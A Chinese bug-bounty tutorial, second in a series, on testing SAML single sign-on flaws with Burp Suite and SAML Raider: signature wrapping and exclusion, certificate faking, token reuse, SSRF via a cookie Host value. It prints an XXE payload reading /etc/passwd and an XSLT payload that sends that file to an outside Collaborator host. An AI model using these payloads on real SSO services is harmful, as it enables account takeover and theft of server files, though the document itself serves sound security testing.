赏金猎人系列-如何测试sso相关的漏洞(II)

简介: 前言本文承接前文:赏金猎人系列-如何测试sso相关的漏洞,继续梳理sso漏洞相关的测试方法.

前言


本文承接前文:赏金猎人系列-如何测试sso相关的漏洞,继续梳理sso漏洞相关的测试方法.


正文

第八种情况

如果发现有uuid的这种形式,可以尝试将其更改为攻击者的uuid,例如,你可以改为内部员工或者说是管理员的账户的电子邮箱;

测试步骤:(工具使用Burp Suite)

  1. 用令牌拦截SAML请求
  2. 将请求发送是Repeater
  3. 切换到SAML Raider标签
  4. 将UUID更改为受害者帐户的UUID
  5. 点击Go

第九种情况

尝试弄清楚服务器是否容易受到XSW(XML Signature Wrapping)的攻击?

测试步骤:

1.用令牌拦截SAML请求 2.将请求发送是Repeater 3.切换到SAML Raider标签 4.选择XSW号码攻击,例如XSW3 5.点击Apply XSW 6.点击Go

第十种情况

试着找出服务器是否容易受到XSE(XML Signature Exclusion )的攻击

测试步骤:

1.用令牌拦截SAML请求 2.将请求发送是Repeater 3.切换到SAML Raider标签 4.点击Remove Signatures 6.点击Go

第十一种情况

试着弄清楚服务器是否检查签名者的身份

测试步骤:

1.用令牌拦截SAML请求

2.将请求发送是Repeater

3.切换到SAML Raider标签

4.点击Sent Certificate至SAML Raider的证书

5.切换至SAML Raider Certificates

6.点击Save and Self-Sign

7.返回至SAML Raider Tab

8.点击On (Re-)Sign message 或者 Assertion 或者 Both

9.点击Go

第十二种情况

尝试在SAML响应的顶部注入XXE有效负载:

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "file:///etc/passwd">
<!ENTITY dtd SYSTEM "http://www.me.com/text.dtd" >]>
<samlp:Response ID="" > <saml:Issuer></saml:Issuer>
<ds:Signature > 
......
&dtd
.....

第十三种情况

尝试将XSLT有效负载作为SAML响应的子节点注入Transforms元素

...
<ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
...
<ds:Transforms>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="doc">
<xsl:variable name="file" select="unparsed-text('/etc/passwd')"/> <xsl:variable name="escaped" select="encode-for-uri($file)"/> <xsl:variable name="attackerUrl" select="'http://id.burpcollaborator.net/'"/> <xsl:variable name="exploitUrl" select="concat($attackerUrl,$escaped)"/> <xsl:value-of select="unparsed-text($exploitUrl)"/>
</xsl:template> </xsl:stylesheet> </ds:Transforms>
</ds:Signature> 
...

第十四种情况

如果受害者能够接受由为攻击者提供服务的同一身份提供者所发行的令牌,那么你就可以接管受害者的账户。

测试步骤:

1.拦截SAML令牌响应

2.向受害者发送SAML令牌响应

3.尝试让受害者点击SAML令牌响应

4.从攻击者的浏览器尝试使用SAML令牌响应

第十五种情况

在测试SSO时,尝试在Burp Suite中搜索Cookie头中的url,例如Host=IP;如果有尝试改变IP为你的IP,以获得SSRF

POST /sso HTTP/1.1
Host: www.company.com 
User-Agent: Mozilla/5.0
Cookie: Host=changed-IP:PORT; 
Referer: https://previous.com/path 
Origin: https://www.company.com
RelayState=path&SAMLResponse=base64(SAML-Structure)


参考

https://hackerone.com/reports/136169

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#xml-signature-wrapping

https://research.aurainfosec.io/bypassing-saml20-SSO/?lipi=urn%3Ali%3Apage%3Ad_flagship3_feed%3BxtHwFzjkSyaBXhbuvBbOYg%3D%3D

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#xml-signature-exclusion

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#xml-external-entity-via-saml

https://web-in-security.blogspot.com/2014/11/detecting-and-exploiting-xxe-in-saml.html

https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#extensible-stylesheet-language-transformation-via-saml

https://www.contextis.com/en/blog/xslt-server-side-injection-attacks

https://web.archive.org/web/20190505230052/https://www.contextis.com/en/blog/xslt-server-side-injection-attacks

https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#token-recipient-confusion

https://www.economyofmechanism.com/office365-authbypass.html

https://medium.com/@th3g3nt3l/how-i-found-an-ssrf-in-yahoo-guesthouse-recon-wins-8722672e41d4

目录
相关文章
|
7月前
|
SQL 安全 关系型数据库
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞,品相还不错,可执行任意 SQL 语句。 总之,吃了一惊,一个防 SQL 注入的工具居然也有 SQL 注入漏洞。 请看这段代码
596 9
|
2月前
|
安全 程序员 网络安全
Kali渗透测试:对软件的溢出漏洞进行测试
Kali渗透测试:对软件的溢出漏洞进行测试
41 1
|
3月前
|
安全 Java 应用服务中间件
渗透测试-JBoss 5.x/6.x反序列化漏洞
渗透测试-JBoss 5.x/6.x反序列化漏洞
55 14
|
2月前
|
安全 网络协议 Linux
Kali渗透测试:使用Armitage针对漏洞进行攻击
Kali渗透测试:使用Armitage针对漏洞进行攻击
83 0
|
3月前
|
安全 网络安全 数据安全/隐私保护
渗透测试-Openssl心脏出血漏洞复现
渗透测试-Openssl心脏出血漏洞复现
151 7
|
3月前
|
安全 测试技术 Linux
CentOS7 安装vulhub漏洞测试环境
CentOS7 安装vulhub漏洞测试环境
133 0
|
4月前
|
安全 应用服务中间件 网络安全
Python 渗透测试:漏洞的批量搜索与利用.(GlassFish 任意文件读取)
Python 渗透测试:漏洞的批量搜索与利用.(GlassFish 任意文件读取)
60 11
|
4月前
|
安全 测试技术 网络安全
|
5月前
|
安全 测试技术 网络安全
探索自动化测试:从理论到实践网络防御的盾牌与剑:漏洞解析与加密技术实战
【7月更文挑战第31天】在软件工程领域,自动化测试是确保产品质量和提升开发效率的关键工具。本文将深入探讨自动化测试的核心概念、优势以及面临的挑战,并通过一个具体的代码示例来展示如何在实际项目中实施自动化测试。我们将看到,通过采用恰当的策略和技术,自动化测试不仅能够提高测试覆盖率,还可以缩短反馈周期,从而加速迭代速度。 【7月更文挑战第31天】在数字世界的无垠战场上,网络安全和信息安全是守护数据宝藏的盾牌与剑。本文将深入探讨网络安全的脆弱点,揭示加密技术的奥秘,并唤醒每一位数字时代居民的安全意识。通过代码示例和案例分析,我们将一起穿梭在信息的海洋中,学习如何铸造坚不可摧的防御,以及如何运用高超
85 0
|
7月前
|
安全 数据管理 测试技术
网络安全与信息安全:防范漏洞、加强加密与提升安全意识深入探索自动化测试框架的设计原则与实践应用化测试解决方案。文章不仅涵盖了框架选择的标准,还详细阐述了如何根据项目需求定制测试流程,以及如何利用持续集成工具实现测试的自动触发和结果反馈。最后,文中还将讨论测试数据管理、测试用例优化及团队协作等关键问题,为读者提供全面的自动化测试框架设计与实施指南。
【5月更文挑战第27天】 在数字化时代,网络安全与信息安全已成为维护国家安全、企业利益和个人隐私的重要环节。本文旨在分享关于网络安全漏洞的识别与防范、加密技术的应用以及提升安全意识的重要性。通过对这些方面的深入探讨,我们希望能为读者提供一些实用的建议和策略,以应对日益严峻的网络安全挑战。 【5月更文挑战第27天】 在软件开发周期中,自动化测试作为保障软件质量的关键步骤,其重要性日益凸显。本文旨在剖析自动化测试框架设计的核心原则,并结合具体案例探讨其在实际应用中的执行策略。通过对比分析不同测试框架的优缺点,我们提出一套高效、可扩展且易于维护的自动
下一篇
DataWorks